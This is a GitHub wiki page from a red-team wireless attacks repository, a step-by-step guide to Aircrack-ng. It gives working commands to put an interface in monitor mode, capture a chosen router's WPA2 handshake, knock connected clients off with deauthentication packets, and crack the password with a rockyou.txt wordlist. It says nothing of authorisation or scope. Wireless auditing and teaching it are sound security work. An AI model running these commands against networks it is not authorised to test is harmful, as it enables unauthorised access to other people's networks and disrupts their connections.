Aircrack‐ng - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Aircrack-ng – Complete Guide

Introduction

Aircrack-ng is a suite of tools for wireless network auditing. It allows you to capture packets, analyze traffic, and crack Wi-Fi passwords protected by WEP, WPA, and WPA2.

Installation

Linux (Debian/Ubuntu)

sudo apt update && sudo apt install aircrack-ng -y

Arch Linux

sudo pacman -S aircrack-ng

macOS (Homebrew)

brew install aircrack-ng

Windows

Download the official binary: https://www.aircrack-ng.org/downloads.html

Main Commands

1. List Wireless Interfaces

Before starting an attack, we need to identify available interfaces:

airmon-ng

2. Enable Monitor Mode

Monitor mode allows you to capture Wi-Fi packets without connecting to a network:

airmon-ng start wlan0

Note: Replace wlan0 with the name of your interface.

3. Capture Wi-Fi Packets

To identify nearby networks and capture packets:

airodump-ng wlan0mon

Explanation:

  • wlan0mon → Wi-Fi interface in monitor mode.
  • Displays SSID, BSSID, channels, encryption, and connected devices.

4. Capture WPA2 Handshake

  1. Choose a target and capture packets:

    airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0mon

    🔹 Example:

    airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
    • -c 6 → Wi-Fi channel.
    • --bssid AA:BB:CC:DD:EE:FF → Target router MAC address.
    • -w capture → Save packets to capture.cap.

  2. Force a device to reconnect (capture handshake faster):

    aireplay-ng -0 5 -a [BSSID] -c [CLIENT_MAC] wlan0mon

    🔹 Example:

    aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
    • -0 5 → Sends 5 deauthentication packets.
    • -a → BSSID of the target router.
    • -c → MAC address of the connected client.

  3. Check if the handshake was captured

    aircrack-ng capture.cap

    If you see [ WPA handshake: AA:BB:CC:DD:EE:FF ], the handshake was captured. ✅

5. Crack WPA/WPA2 Password

After capturing the handshake, we use a password dictionary to try to crack the password:

aircrack-ng -w wordlist.txt -b [BSSID] capture.cap

🔹 Example:

aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap

Note: The cracking time depends on the password complexity and the dictionary used.

References